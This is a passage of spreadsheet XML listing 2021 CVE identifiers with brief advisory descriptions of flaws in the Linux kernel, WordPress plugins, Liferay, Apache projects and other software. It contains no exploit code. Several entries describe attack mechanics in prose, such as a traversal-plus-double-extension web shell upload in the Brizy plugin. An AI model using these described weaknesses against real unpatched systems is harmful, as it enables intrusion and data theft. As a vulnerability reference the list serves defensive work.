    <t>arch/powerpc/perf/core-book3s.c in the Linux kernel before 5.12.13, on systems with perf_event_paranoid=-1 and no specific PMU driver support registered, allows local users to cause a denial of service (perf_instruction_pointer NULL pointer dereference and OOPS) via a "perf record" command.</t>
  </si>
  <si>
    <t>CVE-2021-38201</t>
  </si>
  <si>
    <t>net/sunrpc/xdr.c in the Linux kernel before 5.13.4 allows remote attackers to cause a denial of service (xdr_set_page_base slab-out-of-bounds access) by performing many NFS 4.2 READ_PLUS operations.</t>
  </si>
  <si>
    <t>CVE-2021-38202</t>
  </si>
  <si>
    <t>fs/nfsd/trace.h in the Linux kernel before 5.13.4 might allow remote attackers to cause a denial of service (out-of-bounds read in strlen) by sending NFS traffic when the trace event framework is being used for nfsd.</t>
  </si>
  <si>
    <t>CVE-2021-38203</t>
  </si>
  <si>
    <t>btrfs in the Linux kernel before 5.13.4 allows attackers to cause a denial of service (deadlock) via processes that trigger allocation of new system chunks during times when there is a shortage of free space in the system space_info.</t>
  </si>
  <si>
    <t>CVE-2021-38204</t>
  </si>
  <si>
    <t>drivers/usb/host/max3421-hcd.c in the Linux kernel before 5.13.6 allows physically proximate attackers to cause a denial of service (use-after-free and panic) by removing a MAX-3421 USB device in certain situations.</t>
  </si>
  <si>
    <t>CVE-2021-38205</t>
  </si>
  <si>
    <t>drivers/net/ethernet/xilinx/xilinx_emaclite.c in the Linux kernel before 5.13.3 makes it easier for attackers to defeat an ASLR protection mechanism because it prints a kernel pointer (i.e., the real IOMEM pointer).</t>
  </si>
  <si>
    <t>CVE-2021-38206</t>
  </si>
  <si>
    <t>The mac80211 subsystem in the Linux kernel before 5.12.13, when a device supporting only 5 GHz is used, allows attackers to cause a denial of service (NULL pointer dereference in the radiotap parser) by injecting a frame with 802.11a rates.</t>
  </si>
  <si>
    <t>CVE-2021-38207</t>
  </si>
  <si>
    <t>drivers/net/ethernet/xilinx/ll_temac_main.c in the Linux kernel before 5.12.13 allows remote attackers to cause a denial of service (buffer overflow and lockup) by sending heavy network traffic for about ten minutes.</t>
  </si>
  <si>
    <t>CVE-2021-38208</t>
  </si>
  <si>
    <t>net/nfc/llcp_sock.c in the Linux kernel before 5.12.10 allows local unprivileged users to cause a denial of service (NULL pointer dereference and BUG) by making a getsockname call after a certain type of failure of a bind call.</t>
  </si>
  <si>
    <t>CVE-2021-38209</t>
  </si>
  <si>
    <t>net/netfilter/nf_conntrack_standalone.c in the Linux kernel before 5.12.2 allows observation of changes in any net namespace because these changes are leaked into all other net namespaces. This is related to the NF_SYSCTL_CT_MAX, NF_SYSCTL_CT_EXPECT_MAX, and NF_SYSCTL_CT_BUCKETS sysctls.</t>
  </si>
  <si>
    <t>CVE-2021-38217</t>
  </si>
  <si>
    <t>SEMCMS v 1.2 is vulnerable to SQL Injection via SEMCMS_User.php.</t>
  </si>
  <si>
    <t>CVE-2021-3822</t>
  </si>
  <si>
    <t>jsoneditor is vulnerable to Inefficient Regular Expression Complexity</t>
  </si>
  <si>
    <t>CVE-2021-38221</t>
  </si>
  <si>
    <t>bbs-go &lt;= 3.3.0 including Custom Edition is vulnerable to stored XSS.</t>
  </si>
  <si>
    <t>CVE-2021-3823</t>
  </si>
  <si>
    <t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in the UpdateServer component of Bitdefender GravityZone allows an attacker to execute arbitrary code on vulnerable instances. This issue affects: Bitdefender GravityZone versions prior to 3.3.8.249.</t>
  </si>
  <si>
    <t>CVE-2021-3824</t>
  </si>
  <si>
    <t>OpenVPN Access Server 2.9.0 through 2.9.4 allow remote attackers to inject arbitrary web script or HTML via the web login page URL.</t>
  </si>
  <si>
    <t>CVE-2021-38244</t>
  </si>
  <si>
    <t>A regular expression denial of service (ReDoS) vulnerability exits in cbioportal 3.6.21 and older via a POST request to /ProteinArraySignificanceTest.json.</t>
  </si>
  <si>
    <t>CVE-2021-3825</t>
  </si>
  <si>
    <t>On 2.1.15 version and below of Lider module in LiderAhenk software is leaking it's configurations via an unsecured API. An attacker with an access to the configurations API could get valid LDAP credentials.</t>
  </si>
  <si>
    <t>CVE-2021-38258</t>
  </si>
  <si>
    <t>NXP MCUXpresso SDK v2.7.0 was discovered to contain a buffer overflow in the function USB_HostProcessCallback().</t>
  </si>
  <si>
    <t>CVE-2021-3826</t>
  </si>
  <si>
    <t>Heap/stack buffer overflow in the dlang_lname function in d-demangle.c in libiberty allows attackers to potentially cause a denial of service (segmentation fault and crash) via a crafted mangled symbol.</t>
  </si>
  <si>
    <t>CVE-2021-38260</t>
  </si>
  <si>
    <t>NXP MCUXpresso SDK v2.7.0 was discovered to contain a buffer overflow in the function USB_HostParseDeviceConfigurationDescriptor().</t>
  </si>
  <si>
    <t>CVE-2021-38263</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability in the Server module's script console in Liferay Portal 7.3.2 and earlier, and Liferay DXP 7.0 before fix pack 101, 7.1 before fix pack 20 and 7.2 before fix pack 10 allows remote attackers to inject arbitrary web script or HTML via the output of a script.</t>
  </si>
  <si>
    <t>CVE-2021-38264</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability in the Frontend Taglib module in Liferay Portal 7.4.0 and 7.4.1 allows remote attackers to inject arbitrary web script or HTML into the management toolbar search via the `keywords` parameter. This issue is caused by an incomplete fix in CVE-2021-35463.</t>
  </si>
  <si>
    <t>CVE-2021-38265</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability in the Asset module in Liferay Portal 7.3.4 through 7.3.6 allow remote attackers to inject arbitrary web script or HTML when creating a collection page via the _com_liferay_asset_list_web_portlet_AssetListPortlet_title parameter.</t>
  </si>
  <si>
    <t>CVE-2021-38266</t>
  </si>
  <si>
    <t>The Portal Security module in Liferay Portal 7.2.1 and earlier, and Liferay DXP 7.0 before fix pack 90, 7.1 before fix pack 17 and 7.2 before fix pack 5 does not correctly import users from LDAP, which allows remote attackers to prevent a legitimate user from authenticating by attempting to sign in as a user that exist in LDAP.</t>
  </si>
  <si>
    <t>CVE-2021-38267</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability in the Blogs module's edit blog entry page in Liferay Portal 7.3.2 through 7.3.6, and Liferay DXP 7.3 before fix pack 2 allows remote attackers to inject arbitrary web script or HTML via the _com_liferay_blogs_web_portlet_BlogsAdminPortlet_title and _com_liferay_blogs_web_portlet_BlogsAdminPortlet_subtitle parameter.</t>
  </si>
  <si>
    <t>CVE-2021-38268</t>
  </si>
  <si>
    <t>The Dynamic Data Mapping module in Liferay Portal 7.0.0 through 7.3.6, and Liferay DXP 7.0 before fix pack 101, 7.1 before fix pack 21, 7.2 before fix pack 10 and 7.3 before fix pack 2 incorrectly sets default permissions for site members, which allows remote authenticated users with the site member role to add and duplicate forms, via the UI or the API.</t>
  </si>
  <si>
    <t>CVE-2021-38269</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability in the Gogo Shell module in Liferay Portal 7.1.0 through 7.3.6 and 7.4.0, and Liferay DXP 7.1 before fix pack 23, 7.2 before fix pack 13, and 7.3 before fix pack 2 allows remote attackers to inject arbitrary web script or HTML via the output of a Gogo Shell command.</t>
  </si>
  <si>
    <t>CVE-2021-3827</t>
  </si>
  <si>
    <t>A flaw was found in keycloak, where the default ECP binding flow allows other authentication flows to be bypassed. By exploiting this behavior, an attacker can bypass the MFA authentication by sending a SOAP request with an AuthnRequest and Authorization header with the user's credentials. The highest threat from this vulnerability is to confidentiality and integrity.</t>
  </si>
  <si>
    <t>CVE-2021-38278</t>
  </si>
  <si>
    <t>Tenda AC10-1200 v15.03.06.23_EN was discovered to contain a buffer overflow via the urls parameter in the saveParentControlInfo function.</t>
  </si>
  <si>
    <t>CVE-2021-3828</t>
  </si>
  <si>
    <t>nltk is vulnerable to Inefficient Regular Expression Complexity</t>
  </si>
  <si>
    <t>CVE-2021-38283</t>
  </si>
  <si>
    <t>Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to read application log files containing sensitive information via a predictable /log URI.</t>
  </si>
  <si>
    <t>CVE-2021-38289</t>
  </si>
  <si>
    <t>An issue has been discovered in Novastar-VNNOX-iCare Novaicare 7.16.0 that gives attacker privilege escalation and allows attackers to view corporate information and SMTP server details, delete users, view roles, and other unspecified impacts.</t>
  </si>
  <si>
    <t>CVE-2021-3829</t>
  </si>
  <si>
    <t>openwhyd is vulnerable to URL Redirection to Untrusted Site</t>
  </si>
  <si>
    <t>CVE-2021-38290</t>
  </si>
  <si>
    <t>A host header attack vulnerability exists in FUEL CMS 1.5.0 through fuel/modules/fuel/config/fuel_constants.php and fuel/modules/fuel/libraries/Asset.php. An attacker can use a man in the middle attack such as phishing.</t>
  </si>
  <si>
    <t>CVE-2021-38291</t>
  </si>
  <si>
    <t>FFmpeg version (git commit de8e6e67e7523e48bb27ac224a0b446df05e1640) suffers from a an assertion failure at src/libavutil/mathematics.c.</t>
  </si>
  <si>
    <t>CVE-2021-38294</t>
  </si>
  <si>
    <t>A Command Injection vulnerability exists in the getTopologyHistory service of the Apache Storm 2.x prior to 2.2.1 and Apache Storm 1.x prior to 1.2.4. A specially crafted thrift request to the Nimbus server allows Remote Code Execution (RCE) prior to authentication.</t>
  </si>
  <si>
    <t>CVE-2021-38295</t>
  </si>
  <si>
    <t>In Apache CouchDB, a malicious user with permission to create documents in a database is able to attach a HTML attachment to a document. If a CouchDB admin opens that attachment in a browser, e.g. via the CouchDB admin interface Fauxton, any JavaScript code embedded in that HTML attachment will be executed within the security context of that admin. A similar route is available with the already deprecated _show and _list functionality. This privilege escalation vulnerability allows an attacker to add or remove data in any database or make configuration changes. This issue affected Apache CouchDB prior to 3.1.2</t>
  </si>
  <si>
    <t>CVE-2021-38296</t>
  </si>
  <si>
    <t>Apache Spark supports end-to-end encryption of RPC connections via "spark.authenticate" and "spark.network.crypto.enabled". In versions 3.1.2 and earlier, it uses a bespoke mutual authentication protocol that allows for full encryption key recovery. After an initial interactive attack, this would allow someone to decrypt plaintext traffic offline. Note that this does not affect security mechanisms controlled by "spark.authenticate.enableSaslEncryption", "spark.io.encryption.enabled", "spark.ssl", "spark.ui.strictTransportSecurity". Update to Apache Spark 3.1.3 or later</t>
  </si>
  <si>
    <t>CVE-2021-38297</t>
  </si>
  <si>
    <t>Go before 1.16.9 and 1.17.x before 1.17.2 has a Buffer Overflow via large arguments in a function invocation from a WASM module, when GOARCH=wasm GOOS=js is used.</t>
  </si>
  <si>
    <t>CVE-2021-38298</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADManager Plus before 7110 is vulnerable to blind XXE.</t>
  </si>
  <si>
    <t>CVE-2021-38299</t>
  </si>
  <si>
    <t>Webauthn Framework 3.3.x before 3.3.4 has Incorrect Access Control. An attacker that controls a user's system is able to login to a vulnerable service using an attached FIDO2 authenticator without passing a check of the user presence.</t>
  </si>
  <si>
    <t>CVE-2021-3830</t>
  </si>
  <si>
    <t>CVE-2021-38300</t>
  </si>
  <si>
    <t>arch/mips/net/bpf_jit.c in the Linux kernel before 5.4.10 can generate undesirable machine code when transforming unprivileged cBPF programs, allowing execution of arbitrary code within the kernel context. This occurs because conditional branches can exceed the 128 KB limit of the MIPS architecture.</t>
  </si>
  <si>
    <t>CVE-2021-38302</t>
  </si>
  <si>
    <t>The Newsletter extension through 4.0.0 for TYPO3 allows SQL Injection.</t>
  </si>
  <si>
    <t>CVE-2021-38303</t>
  </si>
  <si>
    <t>A SQL injection vulnerability exists in Sureline SUREedge Migrator 7.0.7.29360.</t>
  </si>
  <si>
    <t>CVE-2021-38304</t>
  </si>
  <si>
    <t>Improper input validation in the National Instruments NI-PAL driver in versions 20.0.0 and prior may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-38305</t>
  </si>
  <si>
    <t>23andMe Yamale before 3.0.8 allows remote attackers to execute arbitrary code via a crafted schema file. The schema parser uses eval as part of its processing, and tries to protect from malicious expressions by limiting the builtins that are passed to the eval. When processing the schema, each line is run through Python's eval function to make the validator available. A well-constructed string within the schema rules can execute system commands; thus, by exploiting the vulnerability, an attacker can run arbitrary code on the image that invokes Yamale.</t>
  </si>
  <si>
    <t>CVE-2021-38306</t>
  </si>
  <si>
    <t>Network Attached Storage on LG N1T1*** 10124 devices allows an unauthenticated attacker to gain root access via OS command injection in the en/ajp/plugins/access.ssh/checkInstall.php destServer parameter.</t>
  </si>
  <si>
    <t>CVE-2021-3831</t>
  </si>
  <si>
    <t>gnuboard5 is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</t>
  </si>
  <si>
    <t>CVE-2021-38311</t>
  </si>
  <si>
    <t>In Contiki 3.0, potential nonterminating acknowledgment loops exist in the Telnet service. When the negotiated options are already disabled, servers still respond to DONT and WONT requests with WONT or DONT commands, which may lead to infinite acknowledgment loops, denial of service, and excessive CPU consumption.</t>
  </si>
  <si>
    <t>CVE-2021-38312</t>
  </si>
  <si>
    <t>The Gutenberg Template Library &amp; Redux Framework plugin &lt;= 4.2.11 for WordPress used an incorrect authorization check in the REST API endpoints registered under the “redux/v1/templates/” REST Route in “redux-templates/classes/class-api.php”. The `permissions_callback` used in this file only checked for the `edit_posts` capability which is granted to lower-privileged users such as contributors, allowing such users to install arbitrary plugins from the WordPress repository and edit arbitrary posts.</t>
  </si>
  <si>
    <t>CVE-2021-38314</t>
  </si>
  <si>
    <t>The Gutenberg Template Library &amp; Redux Framework plugin &lt;= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`.</t>
  </si>
  <si>
    <t>CVE-2021-38315</t>
  </si>
  <si>
    <t>The SP Project &amp; Document Manager WordPress plugin is vulnerable to attribute-based Reflected Cross-Site Scripting via the from and to parameters in the ~/functions.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 4.25.</t>
  </si>
  <si>
    <t>CVE-2021-38316</t>
  </si>
  <si>
    <t>The WP Academic People List WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the category_name parameter in the ~/admin-panel.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 0.4.1.</t>
  </si>
  <si>
    <t>CVE-2021-38317</t>
  </si>
  <si>
    <t>The Konnichiwa! Membership WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the plan_id parameter in the ~/views/subscriptions.html.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 0.8.3.</t>
  </si>
  <si>
    <t>CVE-2021-38318</t>
  </si>
  <si>
    <t>The 3D Cover Carousel WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the id parameter in the ~/cover-carousel.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.0.</t>
  </si>
  <si>
    <t>CVE-2021-38319</t>
  </si>
  <si>
    <t>The More From Google WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $_SERVER["PHP_SELF"] value in the ~/morefromgoogle.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 0.0.2.</t>
  </si>
  <si>
    <t>CVE-2021-3832</t>
  </si>
  <si>
    <t>Integria IMS in its 5.0.92 version is vulnerable to a Remote Code Execution attack through file uploading. An unauthenticated attacker could abuse the AsyncUpload() function in order to exploit the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-38320</t>
  </si>
  <si>
    <t>The simpleSAMLphp Authentication WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $_SERVER["PHP_SELF"] value in the ~/simplesamlphp-authentication.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 0.7.0.</t>
  </si>
  <si>
    <t>CVE-2021-38321</t>
  </si>
  <si>
    <t>The Custom Menu Plugin WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the selected_menu parameter found in the ~/custom-menus.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.3.3.</t>
  </si>
  <si>
    <t>CVE-2021-38322</t>
  </si>
  <si>
    <t>The Twitter Friends Widget WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the pmc_TF_user and pmc_TF_password parameter found in the ~/twitter-friends-widget.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.1.</t>
  </si>
  <si>
    <t>CVE-2021-38323</t>
  </si>
  <si>
    <t>The RentPress WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the selections parameter found in the ~/src/rentPress/AjaxRequests.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 6.6.4.</t>
  </si>
  <si>
    <t>CVE-2021-38324</t>
  </si>
  <si>
    <t>The SP Rental Manager WordPress plugin is vulnerable to SQL Injection via the orderby parameter found in the ~/user/shortcodes.php file which allows attackers to retrieve information contained in a site's database, in versions up to and including 1.5.3.</t>
  </si>
  <si>
    <t>CVE-2021-38325</t>
  </si>
  <si>
    <t>The User Activation Email WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the uae-key parameter found in the ~/user-activation-email.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.3.0.</t>
  </si>
  <si>
    <t>CVE-2021-38326</t>
  </si>
  <si>
    <t>The Post Title Counter WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the notice parameter found in the ~/post-title-counter.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.1.</t>
  </si>
  <si>
    <t>CVE-2021-38327</t>
  </si>
  <si>
    <t>The YouTube Video Inserter WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $_SERVER["PHP_SELF"] value in the ~/adminUI/settings.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.2.1.0.</t>
  </si>
  <si>
    <t>CVE-2021-38328</t>
  </si>
  <si>
    <t>The Notices WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $_SERVER["PHP_SELF"] value in the ~/notices.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 6.1.</t>
  </si>
  <si>
    <t>CVE-2021-38329</t>
  </si>
  <si>
    <t>The DJ EmailPublish WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $_SERVER["PHP_SELF"] value in the ~/dj-email-publish.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.7.2.</t>
  </si>
  <si>
    <t>CVE-2021-3833</t>
  </si>
  <si>
    <t>Integria IMS login check uses a loose comparator ("==") to compare the MD5 hash of the password provided by the user and the MD5 hash stored in the database. An attacker with a specific formatted password could exploit this vulnerability in order to login in the system with different passwords.</t>
  </si>
  <si>
    <t>CVE-2021-38330</t>
  </si>
  <si>
    <t>The Yet Another bol.com Plugin WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $_SERVER["PHP_SELF"] value in the ~/yabp.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.4.</t>
  </si>
  <si>
    <t>CVE-2021-38331</t>
  </si>
  <si>
    <t>The WP-T-Wap WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the posted parameter found in the ~/wap/writer.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.13.2.</t>
  </si>
  <si>
    <t>CVE-2021-38332</t>
  </si>
  <si>
    <t>The On Page SEO + Whatsapp Chat Button Plugin WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $_SERVER["PHP_SELF"] value in the ~/settings.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.0.1.</t>
  </si>
  <si>
    <t>CVE-2021-38333</t>
  </si>
  <si>
    <t>The WP Scrippets WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $_SERVER["PHP_SELF"] value in the ~/wp-scrippets.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.5.1.</t>
  </si>
  <si>
    <t>CVE-2021-38334</t>
  </si>
  <si>
    <t>The WP Design Maps &amp; Places WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the filename parameter found in the ~/wpdmp-admin.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.2.</t>
  </si>
  <si>
    <t>CVE-2021-38335</t>
  </si>
  <si>
    <t>The Wise Agent Capture Forms WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $_SERVER["PHP_SELF"] value in the ~/WiseAgentCaptureForm.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.0.</t>
  </si>
  <si>
    <t>CVE-2021-38336</t>
  </si>
  <si>
    <t>The Edit Comments XT WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $_SERVER["PHP_SELF"] value in the ~/edit-comments-xt.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.0.</t>
  </si>
  <si>
    <t>CVE-2021-38337</t>
  </si>
  <si>
    <t>The RSVPMaker Excel WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $_SERVER["PHP_SELF"] value in the ~/phpexcel/PHPExcel/Shared/JAMA/docs/download.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.1.</t>
  </si>
  <si>
    <t>CVE-2021-38338</t>
  </si>
  <si>
    <t>The Border Loading Bar WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the `f` and `t` parameter found in the ~/titan-framework/iframe-googlefont-preview.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.0.1.</t>
  </si>
  <si>
    <t>CVE-2021-38339</t>
  </si>
  <si>
    <t>The Simple Matted Thumbnails WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $_SERVER["PHP_SELF"] value in the ~/simple-matted-thumbnail.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.01.</t>
  </si>
  <si>
    <t>CVE-2021-3834</t>
  </si>
  <si>
    <t>Integria IMS in its 5.0.92 version does not filter correctly some fields related to the login.php file. An attacker could exploit this vulnerability in order to perform a cross-site scripting attack (XSS).</t>
  </si>
  <si>
    <t>CVE-2021-38340</t>
  </si>
  <si>
    <t>The Wordpress Simple Shop WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the update_row parameter found in the ~/includes/add_product.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.2.</t>
  </si>
  <si>
    <t>CVE-2021-38341</t>
  </si>
  <si>
    <t>The WooCommerce Payment Gateway Per Category WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $_SERVER["PHP_SELF"] value in the ~/includes/plugin_settings.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 2.0.10.</t>
  </si>
  <si>
    <t>CVE-2021-38342</t>
  </si>
  <si>
    <t>The Nested Pages WordPress plugin &lt;= 3.1.15 was vulnerable to Cross-Site Request Forgery via the `npBulkAction`s and `npBulkEdit` `admin_post` actions, which allowed attackers to trash or permanently purge arbitrary posts as well as changing their status, reassigning their ownership, and editing other metadata.</t>
  </si>
  <si>
    <t>CVE-2021-38343</t>
  </si>
  <si>
    <t>The Nested Pages WordPress plugin &lt;= 3.1.15 was vulnerable to an Open Redirect via the `page` POST parameter in the `npBulkActions`, `npBulkEdit`, `npListingSort`, and `npCategoryFilter` `admin_post` actions.</t>
  </si>
  <si>
    <t>CVE-2021-38344</t>
  </si>
  <si>
    <t>The Brizy Page Builder plugin &lt;= 2.3.11 for WordPress was vulnerable to stored XSS by lower-privileged users such as a subscribers. It was possible to add malicious JavaScript to a page by modifying the request sent to update the page via the brizy_update_item AJAX action and adding JavaScript to the data parameter, which would be executed in the session of any visitor viewing or previewing the post or page.</t>
  </si>
  <si>
    <t>CVE-2021-38345</t>
  </si>
  <si>
    <t>The Brizy Page Builder plugin &lt;= 2.3.11 for WordPress used an incorrect authorization check that allowed any logged-in user accessing any endpoint in the wp-admin directory to modify the content of any existing post or page created with the Brizy editor. An identical issue was found by another researcher in Brizy &lt;= 1.0.125 and fixed in version 1.0.126, but the vulnerability was reintroduced in version 1.0.127.</t>
  </si>
  <si>
    <t>CVE-2021-38346</t>
  </si>
  <si>
    <t>The Brizy Page Builder plugin &lt;= 2.3.11 for WordPress allowed authenticated users to upload executable files to a location of their choice using the brizy_create_block_screenshot AJAX action. The file would be named using the id parameter, which could be prepended with "../" to perform directory traversal, and the file contents were populated via the ibsf parameter, which would be base64-decoded and written to the file. While the plugin added a .jpg extension to all uploaded filenames, a double extension attack was still possible, e.g. a file named shell.php would be saved as shell.php.jpg, and would be executable on a number of common configurations.</t>
  </si>
  <si>
    <t>CVE-2021-38347</t>
  </si>
  <si>
    <t>The Custom Website Data WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the id parameter found in the ~/views/edit.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 2.2.</t>
  </si>
  <si>
    <t>CVE-2021-38348</t>
  </si>
  <si>
    <t>The Advance Search WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the wpas_id parameter found in the ~/inc/admin/views/html-advance-search-admin-options.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.1.2.</t>
  </si>
  <si>
    <t>CVE-2021-38349</t>
  </si>
  <si>
    <t>The Integration of Moneybird for WooCommerce WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the error_description parameter found in the ~/templates/wcmb-admin.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 2.1.1.</t>
  </si>
  <si>
    <t>CVE-2021-3835</t>
  </si>
  <si>
    <t>Buffer overflow in usb device class. Zephyr versions &gt;= v2.6.0 contain Heap-based Buffer Overflow (CWE-122). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-fm6v-8625-99jf</t>
  </si>
  <si>
    <t>CVE-2021-38350</t>
  </si>
  <si>
    <t>The spideranalyse WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the date parameter found in the ~/analyse/index.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 0.0.1.</t>
  </si>
  <si>
    <t>CVE-2021-38351</t>
  </si>
  <si>
    <t>The OSD Subscribe WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the osd_subscribe_message parameter found in the ~/options/osd_subscribe_options_subscribers.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.2.3.</t>
  </si>
  <si>
    <t>CVE-2021-38352</t>
  </si>
  <si>
    <t>The Feedify – Web Push Notifications WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the feedify_msg parameter found in the ~/includes/base.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 2.1.8.</t>
  </si>
  <si>
    <t>CVE-2021-38353</t>
  </si>
  <si>
    <t>The Dropdown and scrollable Text WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the content parameter found in the ~/index.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 2.0.</t>
  </si>
  <si>
    <t>CVE-2021-38354</t>
  </si>
  <si>
    <t>The GNU-Mailman Integration WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the gm_error parameter found in the ~/includes/admin/mailing-lists-page.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.0.6.</t>
  </si>
  <si>
    <t>CVE-2021-38355</t>
  </si>
  <si>
    <t>The Bug Library WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the successimportcount parameter found in the ~/bug-library.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 2.0.3.</t>
  </si>
  <si>
    <t>CVE-2021-38356</t>
  </si>
  <si>
    <t>The NextScripts: Social Networks Auto-Poster &lt;= 4.3.20 WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the $_REQUEST['page'] parameter which is echoed out on inc/nxs_class_snap.php by supplying the appropriate value 'nxssnap-post' to load the page in $_GET['page'] along with malicious JavaScript in $_POST['page'].</t>
  </si>
  <si>
    <t>CVE-2021-38357</t>
  </si>
  <si>
    <t>The SMS OVH WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the position parameter found in the ~/sms-ovh-sent.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 0.1.</t>
  </si>
  <si>
    <t>CVE-2021-38358</t>
  </si>
  <si>
    <t>The MoolaMojo WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the classes parameter found in the ~/views/button-generator.html.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 0.7.4.1.</t>
  </si>
  <si>
    <t>CVE-2021-38359</t>
  </si>
  <si>
    <t>The WordPress InviteBox Plugin for viral Refer-a-Friend Promotions WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the message parameter found in the ~/admin/admin.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.4.1.</t>
  </si>
  <si>
    <t>CVE-2021-3836</t>
  </si>
  <si>
    <t>dbeaver is vulnerable to Improper Restriction of XML External Entity Reference</t>
  </si>
  <si>
    <t>CVE-2021-38360</t>
  </si>
  <si>
    <t>The wp-publications WordPress plugin is vulnerable to restrictive local file inclusion via the Q_FILE parameter found in the ~/bibtexbrowser.php file which allows attackers to include local zip files and achieve remote code execution, in versions up to and including 0.0.</t>
  </si>
  <si>
    <t>CVE-2021-38361</t>
  </si>
  <si>
    <t>The .htaccess Redirect WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the link parameter found in the ~/htaccess-redirect.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 0.3.1.</t>
  </si>
  <si>
    <t>CVE-2021-38362</t>
  </si>
  <si>
    <t>In RSA Archer 6.x through 6.9 SP3 (6.9.3.0), an authenticated attacker can make a GET request to a REST API endpoint that is vulnerable to an Insecure Direct Object Reference (IDOR) issue and retrieve sensitive data.</t>
  </si>
  <si>
    <t>CVE-2021-38365</t>
  </si>
  <si>
    <t>Winner (aka ToneWinner) desktop speakers through 2021-08-09 allow remote attackers to recover speech signals from the power-indicator LED via a telescope and an electro-optical sensor, aka a "Glowworm" attack.</t>
  </si>
  <si>
